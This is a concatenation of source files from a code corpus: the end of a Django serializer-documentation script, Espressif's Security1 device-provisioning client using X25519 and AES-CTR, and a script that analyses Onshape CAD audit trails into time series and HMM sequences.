lambda i: issubclass(i, DynModelSerializer) or getattr(i, '_write_docs', False),
)
for item in dir(module):
item = getattr(module, item)
if all(f(item) for f in filters):
yield item
class ArtifactWriter:
_inst = None
def __init__(self):
path = os.environ.get('DOCS_ROOT', './.doc')
if not os.path.exists(path):
os.mkdir(path)
self.doc_root = path
@classmethod
def instance(cls):
if not cls._inst:
cls._inst = cls()
return cls._inst
def dump(self, data, path):
f_name = os.path.join(self.doc_root, '{}.json'.format(path))
with open(f_name, 'w') as f:
json.dump(data, f, cls=DjangoJSONEncoder)
def container_type():
container = os.environ.get('CONTAINER_TYPE')
if not container:
sys.exit('Error: CONTAINER_TYPE is not defined')
return container
def process_item(item, flags):
path = '{}.{}'.format(item.__module__, item.__name__)
if flags.rst:
print('.. dyn_serializer:: {}/{}\n'.format(container_type(), path))
if flags.artifacts:
data = serializer_doc_info(item, path)
ArtifactWriter.instance().dump(data, path)
def process(apps, fun):
f = compose(get_dynserializers, get_modules)(apps)
for s in f:
fun(s)
parser = argparse.ArgumentParser(description='Parse serializers sources')
parser.add_argument('--rst', action='store_true', default=False, help='Output rst with serializers')
parser.add_argument(
'--artifacts', action='store_true', default=False, help='Write serializers artifacts'
)
def main():
sys.path.append('.')
args = parser.parse_args()
if not any((args.rst, args.artifacts)):
parser.print_help()
import django
django.setup()
from django.apps import apps
all_apps = (app.module.__name__ for app in apps.get_app_configs())
process(all_apps, partial(process_item, flags=args))
if __name__ == '__main__':
main()
|
the-stack_0_6138 | # Copyright 2018 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import utils
import proto
from .security import *
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey, X25519PublicKey
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
import session_pb2
class security_state:
REQUEST1 = 0
RESPONSE1_REQUEST2 = 1
RESPONSE2 = 2
FINISHED = 3
class Security1(Security):
def __init__(self, pop, verbose):
self.session_state = security_state.REQUEST1
self.pop = utils.str_to_bytes(pop)
self.verbose = verbose
Security.__init__(self, self.security1_session)
def security1_session(self, response_data):
if (self.session_state == security_state.REQUEST1):
self.session_state = security_state.RESPONSE1_REQUEST2
return self.setup0_request()
if (self.session_state == security_state.RESPONSE1_REQUEST2):
self.session_state = security_state.RESPONSE2
self.setup0_response(response_data)
return self.setup1_request()
if (self.session_state == security_state.RESPONSE2):
self.session_state = security_state.FINISHED
self.setup1_response(response_data)
return None
else:
print("Unexpected state")
return None
def __generate_key(self):
self.client_private_key = X25519PrivateKey.generate()
self.client_public_key = self.client_private_key.public_key()
def _print_verbose(self, data):
if (self.verbose):
print("++++ " + data + " ++++")
def setup0_request(self):
setup_req = session_pb2.SessionData()
setup_req.sec_ver = session_pb2.SecScheme1
self.__generate_key()
setup_req.sec1.sc0.client_pubkey = self.client_public_key.public_bytes()
self._print_verbose("Client Public Key:\t" + utils.bytes_to_hexstr(setup_req.sec1.sc0.client_pubkey))
return setup_req.SerializeToString()
def setup0_response(self, response_data):
setup_resp = proto.session_pb2.SessionData()
setup_resp.ParseFromString(utils.bytearr_to_bytes(response_data))
self._print_verbose("Security version:\t" + str(setup_resp.sec_ver))
if setup_resp.sec_ver != session_pb2.SecScheme1:
print("Incorrect sec scheme")
exit(1)
self._print_verbose("Device Public Key:\t" + utils.bytes_to_hexstr(setup_resp.sec1.sr0.device_pubkey))
self._print_verbose("Device Random:\t" + utils.bytes_to_hexstr(setup_resp.sec1.sr0.device_random))
sharedK = self.client_private_key.exchange(X25519PublicKey.from_public_bytes(setup_resp.sec1.sr0.device_pubkey))
self._print_verbose("Shared Key:\t" + utils.bytes_to_hexstr(sharedK))
if len(self.pop) > 0:
h = hashes.Hash(hashes.SHA256(), backend=default_backend())
h.update(self.pop)
digest = h.finalize()
sharedK = utils.xor(sharedK, digest)
self._print_verbose("New Shared Key XORed with PoP:\t" + utils.bytes_to_hexstr(sharedK))
self._print_verbose("IV " + hex(int(utils.bytes_to_hexstr(setup_resp.sec1.sr0.device_random), 16)))
cipher = Cipher(algorithms.AES(sharedK), modes.CTR(setup_resp.sec1.sr0.device_random), backend=default_backend())
self.cipher = cipher.encryptor()
self.client_verify = self.cipher.update(setup_resp.sec1.sr0.device_pubkey)
self._print_verbose("Client Verify:\t" + utils.bytes_to_hexstr(self.client_verify))
def setup1_request(self):
setup_req = proto.session_pb2.SessionData()
setup_req.sec_ver = session_pb2.SecScheme1
setup_req.sec1.msg = proto.sec1_pb2.Session_Command1
setup_req.sec1.sc1.client_verify_data = self.client_verify
return setup_req.SerializeToString()
def setup1_response(self, response_data):
setup_resp = proto.session_pb2.SessionData()
setup_resp.ParseFromString(utils.bytearr_to_bytes(response_data))
if setup_resp.sec_ver == session_pb2.SecScheme1:
self._print_verbose("Device verify:\t" + utils.bytes_to_hexstr(setup_resp.sec1.sr1.device_verify_data))
enc_client_pubkey = self.cipher.update(setup_resp.sec1.sr1.device_verify_data)
self._print_verbose("Enc client pubkey:\t " + utils.bytes_to_hexstr(enc_client_pubkey))
else:
print("Unsupported security protocol")
return -1
def encrypt_data(self, data):
return self.cipher.update(data)
def decrypt_data(self, data):
return self.cipher.update(utils.bytearr_to_bytes(data))
|
the-stack_0_6140 | import csv
import os
import sys
import datetime
import matplotlib.pyplot as plt
import numpy as np
import json
import copy
sys.path.append("API_Related_Files")
#import API_Related_Files.API_Call_Methods
"""
The default data format for audit trails is:
[index, event time, document, tab, user, description, feature reference, notes]
Process to download audit trails from Onshape
Tip:
- Download as an excel file from Onshape, make any necessary edits to the audit trail (cleaning up, deleting/fixing entries, etc) then save as csv file before running analysis on it. Excel sometimes defaults to stripping the seconds off of the event time entries when saving as csv depending on your system time format settings.
We can use datetime to convert the "event time" column strings to datetime objects:
datetime.datetime.strptime(row[1], "%Y-%m-%d %H:%M:%S")
Current limitations:
- currently searching only one entry forward and backwards of "insert feature" and "Edit : XXX" entries for
"add of modify a sketch" to determine whether the feature inserted/edited was a sketch. This looks like it may catch
vast majority of cases but still not fool proof. Searching 2 forward/back might introduce other unwanted problems though
- currently lumping time spent on edits with no changes (clicked into edit something then clicked green checkmark without having made any actual changes) together with cancelledEditTime
Key assumptions:
- assumes first entry (bottom of csv) is "open document", which marks the beginning of the task
- assumes last entry (top of csv) is "closed document", marking the end of the task
(Currently this requires manually editing the csv file once downloaded from Onshape)
"""
def read_file(fileName) -> None:
"""
This function reads audit trails data and performs basic audit trail integrity checks.
Currently, it checks the indices for being in order and date and time matches the expected format,
then creates a cleaned version and outputs that as a separate file
"""
# To store all data in the audit trail csv file
orig_data = []
# Builds the filepath by appending the file name to the current work directory
# The raw participant audit trails should be stored in a subfolder called "Participant_audit_trails"
filePathName = os.path.join(os.getcwd(), "Participant_audit_trails", fileName)
# print("Opening file: " + filePathName)
# Open csv file and copy all rows into "orig_data"
with open(filePathName, 'r') as csv_file:
data_reader = csv.reader(csv_file)
for row in data_reader:
orig_data.append(row)
# Check that index column starts at 1 and doesn't skip any numbers
if str(orig_data[1][0]) != "1":
print("Index does not start with 1!")
return -1
# Next, check if index is in order starting from 1
totalEntries = len(orig_data) - 1
# Note: we're doing 1 less than len(orig_data) to not count the top row as an entry since that's the column header
for index in range(1, totalEntries):
# print("Checking index: " + str(index) + " dataset index: " + str(orig_data[index][0]))
if str(orig_data[index][0]) != str(index):
print("Index not in order!")
print("Expected index " + str(index) + " Dataset index " + str(orig_data[index][0]))
return -1
else:
pass
# Optional:
# print("INFO: Original input file indices check out")
# print("INFO: Number of entries in dataset: " + str(totalEntries))
# call function to clean the csv
cleanCsv(fileName, orig_data)
return None
def cleanCsv(fileName, orig_data):
"""
Clean CSV file to get rid of useless entries
Entries that get deleted:
- "Update Part Metadata"
- "Commit add or edit of part studio feature"
Purposefully NOT removing "Add or modify a sketch" entries since we'll be using those to identify if an inserted/edited
feature was a sketch or not during analysis (hopefully this will not be necessary in the future if Onshape updates the
audit trails)
"""
# First, create the "filename_cleaned" string, the [:-4] gets rid of the ".csv" part,
# slotting "_cleaned" before the .csv part. We will save a separate "cleaned" audit trail as output
cleanedFileName = fileName[:-4] + "_cleaned" + fileName[-4:]
#print("Output file name= " + cleanedFileName)
#parentDirectory = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
#outFilePath = os.path.join(parentDirectory, "Participant_audit_trails", cleanedFileName)
outFilePath = os.path.join(os.getcwd(), "Participant_audit_trails", cleanedFileName)
#print("Output file path: ", outFilePath)
# if lines don't contain "commit add" or "metadata" then write the row into the output csv
# at the same time checks each row to make sure time format is as expected
with open(outFilePath, "w", newline="") as out_file:
writer = csv.writer(out_file)
goodEntries = 0
# for loop iteration index to be able to display which entry failed the time format check
for index, row in enumerate(orig_data):
if "Commit add or edit" in row[5] or "Update Part Metadata" in row[5] or "Delete part studio feature" in row[5]:
pass
else:
# if not those above, then make a copy of this row, re-index, then write to output
# also re-index while writing the rows, top row (row 0) should say "Index"
rowCopy = copy.copy(row)
rowCopy[0]=goodEntries
if goodEntries == 0:
rowCopy[0] = "Index"
writer.writerow(rowCopy)
goodEntries += 1
if index == 0:
# first row is the text "Index" so don't check for this row
pass
else:
try:
row[1] = datetime.datetime.strptime(row[1], "%Y-%m-%d %H:%M:%S")
except ValueError:
print("Issue with with date time entry at index: " + str(index))
pass
#print(row[1], " type: ", type(row[1]))
#print("INFO: Number of entries after scrubbing: " + str(goodEntries-1))
# now run the analyze function on the cleaned csv that's just been saved
analyzeAuditTrail(cleanedFileName)
return None
def timeConverter(totalTime):
### This function takes in a datetime object, converts it into number of seconds,
### then into minutes and seconds using divmod, then turns the output into
### integers, then strings for easier printing (eliminates need to mess with formatting floating point format during print)
minSec = divmod(totalTime.total_seconds(), 60)
# divmod returns a tuple of 2 floats (minute, second), convering them to integers
minutes = str(int(minSec[0]))
seconds = str(int(minSec[1]))
return [minutes,seconds]
def analyzeAuditTrail(fileName):
"""
Function to identify the relevant feature for each audit trail entry based on the description
Args:
fileName:
Returns:
"""
#fileName += ".csv"
# current directory is "API_Rel._Files", need to step one directory up first
# os.pardir adds the ".." to the end of the current wd, then abspath fines the actual path of the parent dir
#parentDirectory = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
# stepping into the participant audit trails folder, tacking on file name, with .csv tacked on already
#filePathName = os.path.join(parentDirectory, "Participant_audit_trails", fileName)
# updated file path with main python file at the root of the project folder
filePathName = os.path.join(os.getcwd(), "Participant_audit_trails", fileName)
#print("fileName: " + fileName)
#print("filePathName: " + filePathName)
#print("Opening file: " + filePathName)
data = [] # to store cleaned audit trail data
# load in data (should be the cleaned .csv)
with open(filePathName, 'r') as csv_file:
data_reader = csv.reader(csv_file)
for row in data_reader:
data.append(row)
fileName = fileName.removesuffix(".csv") # fileName = XX_IDXX_cleaned.csv
insertFeatureIndices = []
editFeatureIndices = []
skippedFeatures = []
sketchesCreatedNames = []
# intialize counters (counts instances)
sketchesCreated = featuresCreated = sketchesEdited = featuresEdited = switchedToDrawing = 0
# need to initialize the time counters to 0 seconds first
sketchCreateTime = featureCreateTime = sketchEditTime = featureEditTime = \
readDrawingTime = partstudioTime = datetime.timedelta(seconds=0)
cancelledCreateTime = cancelledEditTime = datetime.timedelta(seconds=0)
# the following counters are operations with no start/end times (noTimeDelta features)
movedFeature = movedRollbackBar = operationsCancelled = undoRedo = createFolder = \
renameFeature = showHide = deletedFeature = 0
# Global variable for controlling how long actions without start & end times should be recorded as (how many seconds)
noTimeDeltaFeatures = 1 #seconds
# these features are: operationsCancelled, movedRollbackBar, movedFeature, undoRedo, createFolder, renameFeature, showHide
# list for hidden markov model building
HMMList = []
HMMList_StartEnd = []
########################
# time_series array will be used to build the sequential list of actions
time_series = []
"""
Each element in the time_series array has the format:
(action type, start time of the action, time duration)
E.g. ("sketch", datetime(00:05:15), datetime(00:00:20))
= did sketching starting at 5 min 15 sec for 20 seconds
All action_type:
-- TO BE DOCUMENTED --
"""
########################
# Convert every entry in the event time column from a string into a datetime object
# Also clear feature reference column (6) in case the file being read already has some existing data
for row in data[1:]: # skip top row since it's just labels
#print(str(len(row)))
row[1] = datetime.datetime.strptime(row[1], "%Y-%m-%d %H:%M:%S")
# the 7th and 8th column might be empty, if so, append a blank entry
try:
row[6] = ""
#print("old row len =" + str(len(row)))
except IndexError:
row.append("")
try:
row[7] = ""
except IndexError:
row.append("")
#print("new row len =" + str(len(row)))
# Dealing with the top header row
# Sometimes the header row will be missing entries, so checking for the proper length, if not, then append as needed
#print(data[0])
if len(data[0]) == 6:
#print("Len is 6")
data[0].append("")
data[0].append("")
elif len(row[0]) == 7:
#print("Len is 7")
data[0].append("")
# then rename row 7 and 8 with proper names
data[0][6] = "Feature Reference"
data[0][7] = "HMM Sequence"
#print(data[0])
# start range() at 1 to skip the top row, then reverse it to start from the bottom of the csv file
for i in reversed(range(1,len(data))):
#print("Currently on index: " + str(i))
# for adding part studio features (sketches/all other feature)
if data[i][5] == "Add part studio feature":
#print("Found add part studio feature at: " + str(i))
featureStartIndex = i
while True:
featureStartIndex -= 1
#print(featureStartIndex)
if "Insert feature" in data[featureStartIndex][5]:
#print("found Insert feature at index " + str(featureStartIndex))
if featureStartIndex in insertFeatureIndices:
# check to see if this insert feature has already been matched to another "add ps feature"
# if yes, then skip to find the next available
pass
else:
# if "add of modify a sketch" is before or after insert feature, that means the
# inserted feature was likely a sketch
if "Add or modify a sketch" in data[featureStartIndex + 1][5] or \
"Add or modify a sketch" in data[featureStartIndex - 1][5]:
#print("Added sketch at: " + str(featureStartIndex))
featureName = data[featureStartIndex][5].split(" : ")[1] + " (Sketch)"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Create"
data[i][7] = "Start Create"
# add this to the running list of discovered insert feature indices
insertFeatureIndices.append(featureStartIndex)
# calculate time spent creating a new sketch
sketchCreateTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "sketchCreateTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1] , (data[featureStartIndex][1] - data[i][1])))
sketchesCreated += 1
sketchesCreatedNames.append(featureName)
HMMList.append("Create")
break
else:
#print("Regular feature added at: " + str(featureStartIndex))
featureName = data[featureStartIndex][5].split(" : ")[1]
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Create"
data[i][7] = "Start Create"
# add this to the running list of discovered insert feature indices
insertFeatureIndices.append(featureStartIndex)
# calculate time spent creating a new feature
featureCreateTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "featureCreateTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1], (data[featureStartIndex][1] - data[i][1])))
featuresCreated += 1
HMMList.append("Create")
break
if "Cancel Operation" in data[featureStartIndex][5]:
#print("Operation cancelled at: " + str(featureStartIndex))
featureName = "Cancelled add feature"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
#data[featureStartIndex][7] = "End Create"
#data[i][7] = "Start Create"
# calculate time spent on a cancelled new feature creation
cancelledCreateTime += data[featureStartIndex][1] - data[i][1]
time_series.append(("cancelCreateTime", data[i][1], (data[featureStartIndex][1] - data[i][1])))
operationsCancelled += 1
#HMMList.append("Create")
break
# for editing of part studio features (sketches/all other feature)
elif data[i][5] == "Start edit of part studio feature":
#print("Found edit of part studio feature at: " + str(i))
featureStartIndex = i
HMMList.append("Revise")
while True:
featureStartIndex -= 1
if "Edit :" in data[featureStartIndex][5]:
#print("found Edit at index " + str(featureStartIndex))
if featureStartIndex in editFeatureIndices:
# check to see if this insert feature has already been matched to another "edit ps feature"
# if yes, then skip to find the next available
pass
else:
if "Add or modify a sketch" in data[featureStartIndex + 1][5] or \
"Add or modify a sketch" in data[featureStartIndex - 1][5]:
#print("Edited (Add or modify) sketch at: " + str(featureStartIndex))
featureName = data[featureStartIndex][5].split(" : ")[1] + " (Sketch)"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Edit"
data[i][7] = "Start Edit"
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# calculate time spent editing a sketch
sketchEditTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "sketchEditTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1] , (data[featureStartIndex][1] - data[i][1])))
sketchesEdited += 1
break
else:
#print("Regular feature edit at: " + str(featureStartIndex))
featureName = data[featureStartIndex][5].split(" : ")[1]
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Edit"
data[i][7] = "Start Edit"
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# calculate time spent editing a feature
featureEditTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "featureEditTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1] , (data[featureStartIndex][1] - data[i][1])))
featuresEdited += 1
break
# if the next thing following "start edit" is "add or modify a sketch" without an "Edit : ", then
# that means the user clicked the green checkmark without making any actual changes to a sketch
elif "Add or modify a sketch" in data[featureStartIndex][5]:
# sometimes the "edit" entry can come after the "add or modify a sketch" entry, so we still need to
# check to make sure the entry above isn't an feature edit commit
# if it is, then this there were in fact modifications done to a sketch feature
if "Edit" in data[featureStartIndex - 1][5]:
featureName = data[featureStartIndex-1][5].split(" : ")[1] + " (Sketch)"
data[featureStartIndex-1][6] = featureName
data[i][6] = featureName
data[featureStartIndex-1][7] = "End Edit"
data[i][7] = "Start Edit"
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# calculate time spent editing a sketch
sketchEditTime += data[featureStartIndex-1][1] - data[i][1]
timeSeriesEntry = "sketchEditTime - " + featureName
time_series.append((timeSeriesEntry, data[i][1], (data[featureStartIndex-1][1] - data[i][1])))
sketchesEdited += 1
break
else:
# if "edit" wasn't found in the entry above, then this was likely a edit with no real changes
featureName = "No change edit to a sketch feature"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Edit"
data[i][7] = "Start Edit"
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# counting this time as same as cancelledEditTime, lumping them together
cancelledEditTime += data[featureStartIndex][1] - data[i][1]
time_series.append(("cancelledEditTime", data[i][1], (data[featureStartIndex][1] - data[i][1])))
operationsCancelled += 1
break
# if another "start edit" or "add part studio feature" is encountered before finding an "edit :", then
# the user likely started editing a feature, but didn't actually make a change before clicking the green checkmark
# essentially leaving two "start edit part studio feature" entries back to back
# similar situation to the no-change edit sitaution for sketches, but in this case there's no entry at all
elif "Start edit of part studio feature" in data[featureStartIndex][5] or \
"Add part studio feature" in data[featureStartIndex][5]:
#print("NO CHANGE FEATURE EDIT AT INDEX: " + str(featureStartIndex))
featureName = "No change edit to a feature"
# only mark the i-th (start) entry with featureName, since there's no ending entry in audit trail
data[i][6] = featureName
# add this to the running list of discovered edit feature indices
editFeatureIndices.append(featureStartIndex)
# counting these as zeroDelta times since there's no way to determine for sure how long they spent on these
cancelledEditTime += datetime.timedelta(seconds=noTimeDeltaFeatures)
time_series.append(("cancelledEditTime", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
operationsCancelled += 1
break
elif "Cancel Operation" in data[featureStartIndex][5]:
#print("Edit operation cancelled at: " + str(featureStartIndex))
featureName = "Cancelled edit feature"
data[featureStartIndex][6] = featureName
data[i][6] = featureName
data[featureStartIndex][7] = "End Edit"
data[i][7] = "Start Edit"
# calculate time spent on a cancelled new feature creation
cancelledEditTime += data[featureStartIndex][1] - data[i][1]
time_series.append(("cancelledEditTime", data[i][1], (data[featureStartIndex][1] - data[i][1])))
operationsCancelled += 1
break
# tracking opening and closing drawings
elif "BLOB opened" in data[i][5]:
currentDrawing = data[i][3]
# search ahead for when this drawing was closed
featureStartIndex = i
HMMList.append("Drawing")
while True:
featureStartIndex -= 1
# finds the next "BLOB closed"
if "BLOB closed" in data[featureStartIndex][5]:
# check and see if this "BLOB closed" matches the current drawing
if data[featureStartIndex][3] == currentDrawing:
data[featureStartIndex][6] = currentDrawing + "(closed)"
data[i][6] = currentDrawing + "(opened)"
#data[featureStartIndex][7] = "Close Drawing"
data[i][7] = "Refer to Drawing"
# calculate time spent reading a drawing
readDrawingTime += data[featureStartIndex][1] - data[i][1]
timeSeriesEntry = "readDrawingTime - " + currentDrawing
time_series.append((timeSeriesEntry, data[i][1], (data[featureStartIndex][1] - data[i][1])))
switchedToDrawing += 1
break
else:
pass
else:
pass
# tracking opening and closing partstudios
elif "PARTSTUDIO opened" in data[i][5]:
currentPS = data[i][3]
# search ahead for when this partstudio was closed
featureStartIndex = i
#print("partstudio open, index: " + str(i))
while True:
featureStartIndex -= 1
# finds the next "BLOB closed"
if "PARTSTUDIO closed" in data[featureStartIndex][5]:
# check and see if this part studio matches the current part studio
# not actually necessary in my dataset since there's only one partstudio
#if data[featureStartIndex][3] == currentPS:
data[featureStartIndex][6] = currentPS + "(closed)"
data[i][6] = currentPS + "(opened)"
# calculate time spent inside partstudios (this will overlap with feature creation and edit times)
partstudioTime += data[featureStartIndex][1] - data[i][1]
time_series.append(("partstudioTime", data[i][1], (data[featureStartIndex][1] - data[i][1])))
# no need to track times switched to partstudio since it should be the same as times switched to drawing
#print("closed: " + str(featureStartIndex))
break
if featureStartIndex == 1:
print("ERROR: Partstudio closed not found! Start index: " + str(i))
break
# tracking moving features or rollback bar
elif "Move" in data[i][5]:
if "Rollback bar" in data[i][5]:
data[i][6] = "-- move rollbackbar +1 --"
time_series.append(("moveRollbackBar", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
movedRollbackBar += 1
#HMMList.append("Revise")
#data[i][7] = "Revise"
elif "tab" in data[i][5]:
# moved a tab, not a feature
data[i][6] = "-- moved tab, ignore --"
else:
data[i][6] = "-- move feature +1 --"
time_series.append(("moveFeature", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
movedFeature += 1
HMMList.append("Organize")
data[i][7] = "Organize"
# tracking undo/redo
elif "Undo Redo" in data[i][5]:
# if the undo/redo was done during sketching, the only etry will be "Undo Redo Operation"
# if the undo/redo is done in partstudio, then there will be one more entry "Undo : 1 step"
# need to check for this
#print("Checking undo (or redo) steps, this one's description is : " + data[i][5])
# the "Undo : " entry can come before or after "Undo Redo Operation"
if "Undo : " in data[i-1][5]:
data[i-1][6] = "-- Feature undoRedo +1 --"
data[i][6] = "-- Feature undoRedo --"
elif "Undo : " in data[i+1][5]:
data[i+1][6] = "-- Feature undoRedo +1 --"
data[i][6] = "-- Feature undoRedo --"
elif "Redo : " in data[i-1][5]:
data[i + 1][6] = "-- Feature undoRedo +1 --"
data[i][6] = "-- Feature undoRedo --"
elif "Redo : " in data[i+1][5]:
data[i + 1][6] = "-- Feature undoRedo +1 --"
data[i][6] = "-- Feature undoRedo --"
else:
data[i][6] = "-- Sketch undoRedo +1 --"
time_series.append(("undoRedo", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
HMMList.append("Revise")
#data[i][7] = "Revise"
# currently grouping all undoRedo together, not separately tracking them
undoRedo += 1
# create folder
elif "Create folder" in data[i][5]:
data[i][6] = "New folder: " + data[i][5].split(" : ")[1]
time_series.append(("createFolder", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
createFolder += 1
HMMList.append("Organize")
data[i][7] = "Organize"
#featureName = data[featureStartIndex-1][5].split(" : ")[1] + " (Sketch)"
elif "Rename" in data[i][5]:
data[i][6] = "-- renameFeature +1 --"
time_series.append(("renameFeature", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
renameFeature += 1
HMMList.append("Organize")
data[i][7] = "Organize"
elif "Show" in data[i][5] or "Hide" in data[i][5]:
data[i][6] = "-- showHide +1 --"
time_series.append(("showHide", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
showHide += 1
elif "Add or modify a sketch" in data[i][5]:
# these entries are already accounted for above, just marking them so they're not blank in the output
#data[i][6] = "-- add/mod. sketch (accounted for) --"
data[i][6] = "---"
elif "Delete" in data[i][5]:
featureName = data[i][5].split(" : ")[1]
data[i][6] = "deleted " + featureName
time_series.append(("deletedFeature", data[i][1], datetime.timedelta(seconds=noTimeDeltaFeatures)))
deletedFeature += 1
HMMList.append("Delete")
data[i][7] = "Delete"
elif "Close document" in data[i][5]:
if data[i][0] != str(1):
print(data[i])
print("Error! Close document is not the last entry!")
return -1
else:
pass
#endTime = datetime.datetime.strptime(data[i][1])
elif "Open document" in data[i][5]:
#startTime = datetime.datetime.strptime(data[i][1])
if data[i][0] != str(len(data)-1): # -1 to account for top row not being a valid entry
print("Error! Open document is not the first entry!")
# a list of things that I don't want to be accidentally marked as skipped, they're all accounted for in sub-routines of
# other higher level elif checks
elif "Edit" in data[i][5] or \
"Insert feature" in data[i][5] or \
"Cancel Operation" in data[i][5] or \
"Create Version" in data[i][5] or \
"Change size" in data[i][5] or \
"Change part appearance" in data[i][5] or \
"Branch Workspace" in data[i][5] or \
"Suppress" in data[i][5] or \
"Unsuppress" in data[i][5] or \
"Unpack" in data[i][5] or \
"Create variable" in data[i][5] or \
"Insert tab" in data[i][5] or \
"BLOB closed" in data[i][5] or \
"PARTSTUDIO closed" in data[i][5] or \
"Update version" in data[i][5] or \
"Create version" in data[i][5] or \
"Undo : " in data[i][5] or \
"Redo : " in data[i][5] or \
"Tab Part Studio 1 Copy 1 of type PARTSTUDIO created by CAD_Study" in data[i][5]:
#
#data[i][6] = "-"
pass
else:
print("WARNING: Not yet accounted for entry at index: " + str(i) + "\n\tDescription: " + data[i][5])
skippedFeatures.append(("Index: " + str(i) + " - Description: " + data[i][5])) # keep track of all skipped features in a list
#pass
# print the list of entries that are skipped, to catch anything new that's not currently being checked for
if skippedFeatures: # if the skippedFeatures list is empty, then it is FALSE, then the if statement won't print
#print("WARNING: Skipped these entries (indices): " + str(skippedFeatures))
print("WARNING, skipped some entries, check the 'skipped' JSON file")
skippedFeatures.insert(0, "Skipped features indices: ")
fileName = fileName.removesuffix(".csv") # fileName = XX_IDXX_cleaned.csv
jsonFileName = os.path.join(os.getcwd(), "Analysis_output", fileName)
jsonFileName = jsonFileName + "_skipped.json"
with open(jsonFileName, 'w') as outfile:
json.dump(skippedFeatures, outfile, indent=0, default=str)
# write cleaned audit trail to a new file
# (if needed) first, create the "filename_cleaned" string
#cleanedFileName = fileName[:-4] + "_cleaned" + fileName[-4:]
# if the function is fed the cleaned filename already then no need to add "_cleaned" to the name
#print("Output file name= " + cleanedFileName)
#parentDirectory = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
# fileName already includes "_cleaned"
outFilePath = os.path.join(os.getcwd(), "Participant_audit_trails", fileName + ".csv")
#print("Output file path: ", outFilePath)
with open(outFilePath, "w", newline="") as out_file:
writer = csv.writer(out_file)
for row in data:
writer.writerow(row)
#print("INFO: Output csv file now includes identified relevant features: " + outFilePath)
############################################################################
#### writing timeseries to json output file for easier manual error checking ####
#print(time_series)
jsonFileName = os.path.join(os.getcwd(), "Analysis_output", fileName)
jsonFileName = jsonFileName + "_timeseries.json"
#print(jsonFileName)
with open(jsonFileName, 'w') as outfile:
# indent=0 prints each list item as a new line, makes it easier to visually read
json.dump(time_series, outfile, indent=0, default=str)
#json.dump(time_series, outfile, default=str)
############################################################################
##################### Write HMM list to json output file ###################
HMMFileName = os.path.join(os.getcwd(), "Analysis_output", fileName)
HMMFileName = HMMFileName + "_HMM_List.json"
#print(HMMFileName)
with open(HMMFileName, 'w') as outfile:
# indent=0 prints each list item as a new line, makes it easier to visually read
json.dump(HMMList, outfile, indent=0, default=str)
#json.dump(HMMList, outfile, default=str)
###########################################################################
######### Write a separate HMM list with start and ends to output #########
entriesToSkip = [""] #, "Close Drawing"] # can potentially exclude close drawing as well
for row in reversed(data[1:]):
#if row[7]:
if row[7] not in entriesToSkip:
HMMList_StartEnd.append(row[7])
# sometimes we will end up with "open" "open" "closed" "closed", should swap things around to be 2x "open" "closed"
for i in range(len(HMMList_StartEnd)-1):
current = HMMList_StartEnd[i]
next = HMMList_StartEnd[i+1]
#print(last)
if current == "Open Drawing" and next == "Open Drawing":
HMMList_StartEnd[i+1], HMMList_StartEnd[i+2] = HMMList_StartEnd[i+2], HMMList_StartEnd[i+1]
#print("Doubled up!")
HMMFileName = os.path.join(os.getcwd(), "Analysis_output", fileName)
HMMFileName = HMMFileName + "_HMM_StartEnd.json"
with open(HMMFileName, 'w') as outfile:
json.dump(HMMList_StartEnd, outfile, indent=0, default=str)
#json.dump(HMMList_StartEnd, outfile, default=str)
#############################################
#### Now deal with creating the eventplot ###
# first, calculate a few derived time values
startTime = data[-1][1]
endTime = data[1][1]
totalTime = endTime - startTime
partstudioTimeAccountedFor = \
sketchCreateTime+featureCreateTime+sketchEditTime+featureEditTime+cancelledCreateTime+cancelledEditTime #+readDrawingTime
unaccountedTime = partstudioTime - partstudioTimeAccountedFor
#print("Unaccounted time: " + str(unaccountedTime))
unaccountedRatio = unaccountedTime / partstudioTime
#print("unaccountedRatio (raw): " + str(unaccountedRatio))
if partstudioTime < partstudioTimeAccountedFor:
print("partstudioTime < partstudioTimeAcocuntedFor! ")
unaccountedTime = 999
unaccountedRatio = 999
##### Append data to existing database #####
database = []
databaseFileName = os.path.join(os.getcwd(), "Analysis_output", "Audit_Trail_Database.csv")
#print(databaseFileName)
